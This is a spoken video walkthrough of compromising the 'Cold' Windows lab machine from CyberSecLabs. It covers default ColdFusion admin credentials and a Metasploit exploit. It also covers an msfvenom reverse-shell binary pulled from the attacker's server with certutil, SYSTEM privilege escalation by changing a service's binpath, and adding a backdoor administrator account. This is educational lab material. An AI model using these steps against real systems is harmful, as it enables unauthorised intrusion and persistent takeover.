Hello everybody, welcome back to this new video. Today we're going to be talking about the Windows box Cold from CyberSecLabs. So let's get started with an Nmap scan. We're going to scan all ports for all services, do all tests, and we'll notice that port 80 is open, which is HTTP. We have RPC open, we have SMB open, we have HTTPS open, we have another HTTP port open here, Jetty. Then we have winRm, yet another HTTP port, Samsung AllShare, and then some higher ports. So let's get started with port 80 here. So you see port 80 is just, if we go to the root here, it redirects us to /dashboard, and we see that's just a basic example page. But at the top here, we have something interesting saying phpinfo and phpMyAdmin. Now phpMyAdmin shows us that we can't access it because it's only available from the local network. However, phpinfo shows us the phpinfo function, or the result of it. And in here, if you start looking through it, for example here, you can notice this weird CFusion extension. Now CFusion, it mentions Adobe ColdFusion, which is a platform for deploying web and mobile applications. Now then you can start looking for pentesting ColdFusion. You can find, for example, this article talking about pentesting ColdFusion. And this article mentions there's ColdFusion scripts under a CFIDE or a CFIDE directory. So now we might wonder, hey, do we have the CFIDE directory? So we could check that here. CFIDE, not found. We could check that on port 5500. Not found. We can check that on port 8500. Oh, not there. I meant to do 8. And we notice, oh, here we get a 404, which was, is that the same as normal? Okay, that's the same as normal. And then we also have HTTPS, where we could try this. And none of that really works. But then you also have word lists for this. So let's take a look at user share word lists, dirbuster, no, I think it's phones, and then coldfusion. We see, okay, this is CFID, CFID administrator. So maybe we need to add administrator to this. So let's take a look at that, if that works. So it's gonna be CFIDE administrator. That doesn't work. HTTP doesn't work. Port 5500 doesn't work. Port 8500 seems to be taking a while, which might be good, and it is good because we see, okay, here we have an admin login. We can try admin. That's a lot of characters. And admin actually works. I believe, yes, we are a developer now. So in here, we can do a lot of stuff. Something else we might check out is we could see if there's exploits for this. So search exploit, coldfusion, and we see that, okay, there is a lot of exploits, and even some that are in metasploit. So metasploit is always a quick, easy thing to search. So let's search for coldfusion here. And we have version, the 2018 release. So it's not going to be any of these below 2018, so we only have this one to check. So let's take a look at that one. So we're going to, not there, we're going to use this one. We're going to do show options. We see, okay, we have to specify our hosts, which is set our hosts on 1.15. We can then, our port is already set correctly at 8500, and we have to specify L host. So L host is going to be ton0, which is my interface for the OpenVPN. So then we can run that, and that succeeded. And now we have a command shell. Who are we? We are currently Jade. So now let's, this is just a command shell, but I would like to have a meterpreter session, which will make it easier for me to work with stuff. So let's do that. So we're going to exploit multi-handler. Okay. Now in here, we can do show options again. Gonna set lhost to ton 0, set lport, let's pick 1, 2, 3, 4, and now we need to create with msfvenom, we can create an exe that's going to be a reverse shell to go to here. So if we run this, we'll see it opens a reverse handler locally, and we can have a reverse shell connect to that and give us a meterpreter session. So for that, we're going to do msfvenom. We're going to do use the payload Windows meterpreter. Ooh, and actually here we forgot something, because we see the payload here is Android meterpreter reverse HTTPS, which we don't want. So we're going to set payload to, that's not how you type it, payload to be Windows meterpreter, and then reverse, is it reverse TCP? TCP. Let's run that. Okay. And here we're going to do the same thing, reverse underscore TCP. We want to have the file be an exe, and we'll put that into reverse.exe. So that's going to create our reverse shell binary. Okay. So now we can upload that binary, and for uploading, I am going to use cert util dash URL cache dash split and then dash f, and we also have to open our server here, so python 3 dash m http server on port 80. So then we can connect to our server here. Our IP is 10.10.0.8. Did I open this on port 80? Yes. And then we can do reverse.exe. So that's going to download. And if you don't know how I found that, so again, the cheat sheets, the collection of cheat sheets. So if you just go to here, shells, and then shells Windows. There's a lot of these you can try, but for downloading, I like to use the cert util. Okay, so that's completed successfully. If we go back here, we see, okay, it got that file. So now we can run from here, reverse.exe. Oh, we totally forgot something when creating this. So here we have to specify the lhost as well, which is going to be 10.10.0.8, because else how is the binary supposed to know where to connect to? And the port was 1234. So this is going to create that binary again. And also in this case, if you want to know how to do that, here is a cheat sheet for metasploit Venom. That explains everything in a lot of detail, going over the payloads and things you can do. But that is created right now, so we can open our Python server again, and we can download this file once more. It doesn't work. Let's try, oh, it actually downloaded. Let's try removing that file first that we downloaded earlier. And now try that again. Still doesn't work. Error sharing violation. What if we give this a different name? So if we move reverse.exe to ref.exe. Oh, that's not what I want to do. Okay. And then we say ref.exe here. Internet cannot connect. my IP is correct. Connection with the server. Oh, we don't have the server open, obviously. So that's logical. Oh, and that now it worked. Okay, so we had to change the name. So now we have the shell here, so now we can do ref.exe, and we get a meterpreter session open here. Okay, so that's nice, that's nice. So now let's go into a shell here, and now we can do PowerShell, and we are in a PowerShell shell right now. So now let's start doing some enumeration as this user. So we're gonna upload winPEAS, so we're gonna do /cd/opt /privilege escalation winPEAS winPEAS exe, then release, no it's not here, oh winPEAS again, then release, nope, then bin, then release, yes. Okay, so for ls here we have winPEAS.exe here. So we can open our Python server again and upload that file again using certutil, copy that, and then winPEAS.exe. I uploaded, so now we can run winPEAS, oh, that has to be this kind of /winPEAS.exe. winPEAS is going to do a lot of checks for us, hopefully at least, but not right now it seems. So let's terminate this one, get a new shell, and try that as exe instead of PowerShell. winPEAS.exe. Okay, there we go. So, okay, that's a lot of output. No credential guard, no LSA protection, no antivirus. We have the SE impersonate privilege, so possibly a rotten potato is possible. Okay, here processes, possible DLL hijacking. Okay, this is all possible DLL hijacking. Services, more possible DLL hijacking, and we can modify a service cold.exe, and we can modify that. Okay. So for winPEAS, a lot of these checks actually have a link there that we can open and go to. So let's see, it was about modifying. So we can modify a service. So if we modify the service path, oh, it's moved us around a bit. Let's load this page again. Okay. Oh, here. Okay, modifying service. So we can modify it to run a different binary on startup. So we can do sc config, or service name, and then a bin path. So let's try that with our cold.exe service, which is called cold. So what I'm going to do, let's get this up the top. Oh, that doesn't work. Okay, sc, make this a bit bigger, sc, and then we want to do config cold. We want to set the binary path to be equal to, and for this we can reuse the reverse.exe or the ref.exe that we uploaded to get this meterpreter shell. So that is located at C coldfusion 2018 cfusion /bin /ref.exe. Okay, so we changed that successfully. Now in order to run that, we'll quit this shell and we'll use again exploit multi-handler, show the options, set our L host, set our L port to 1234 because that's what we specified in the binary. Our payload should probably also be changed, yeah. Set payload to be Windows meterpreter reverse TCP. So now if we run this, we start our handler, and now we can do sc start cold, which is going to start, It's gonna then run this binary that we specified, and now we have a meterpreter session. And now we can go into the shell, and who are we? We are currently system. We are the administrator of this server now. So let's see if we can go to the users directory, administrator, and we can go to desktop. Oh, and our session closed. So it turns out this shell isn't really that stable. So let's try to get a stable shell as an administrator. So we're gonna run this handler again, and then we can do here sc start cold again. So we get a new session here, and we'll create a new user. So net user pink. Then we have to specify a password, which has to be an actually decent password, because else the box is going to be mad at us and not allow us to create a user. Oh, first we have to go into shell as well. Let's copy this again. Create our user, and then we can do net local group administrators, and then add pink to that group. Oh, I'm not sure if that actually worked or not. It might not have, but let's take a look. So we can close this. We can get evil-winrm with the IP of the box, like that. Then the user pink, and then the password, which was pink draconian. In the meanwhile, we'll also get this going again, because I doubt it actually worked. Okay, so sc start cold, start the service again. Okay, we get our meterpreter session again. Meanwhile, this is still going, so I believe that means it didn't work. But our user has been created, right? Net users. Yes, pink has been created. So we can try adding him again. Okay, that worked. So now we can run this. Get a winrm session, PowerShell session as pink. That should be way more stable and usable. And there we go. So who am I? Dash all. It's going to show us, yes, we are administrators. We can go to users, administrator, desktop, and we can list files here, and we can see that we have access to system.txt right now. So that was this box. I think this Windows box was another really good box to teach people a lot about Windows shells, and because that stuff is difficult, and I find it difficult as well. It's a lot of messing about, trying to find stuff that works for you. But I hope you enjoyed this video. I hope you learned something from this. If you have any more questions, please leave them down below in the comments, and I'll see you back for another video.